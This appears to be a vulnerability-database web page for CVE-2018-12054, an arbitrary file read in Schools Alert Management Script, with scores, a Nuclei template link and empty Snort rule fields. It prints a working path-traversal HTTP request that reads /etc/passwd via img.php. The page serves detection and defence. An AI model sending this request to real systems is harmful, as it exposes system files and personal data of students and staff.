🔙 목록으로 돌아가기

CVE-2018-12054: Schools Alert Management Script - Arbitrary File Read

TitleSchools Alert Management Script - Arbitrary File Read
Authorwisnupramoedya
SeverityHigh
ImpactThis vulnerability can lead to unauthorized access to sensitive information stored on the system, potentially exposing personal data of students, staff, and other stakeholders.
RemediationApply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerability in the Schools Alert Management Script.
CVSS Score7.5
EPSS Score0.76183
CVE IDCVE-2018-12054
CWE IDCWE-22
Tags cve cve2018 lfi edb schools_alert_management_script_project vuln

🔍 Vulnerability Description

Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal.

🌐 HTTP Request

GET /img.php?f=/./etc/./passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/4.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-12054.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-12054.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A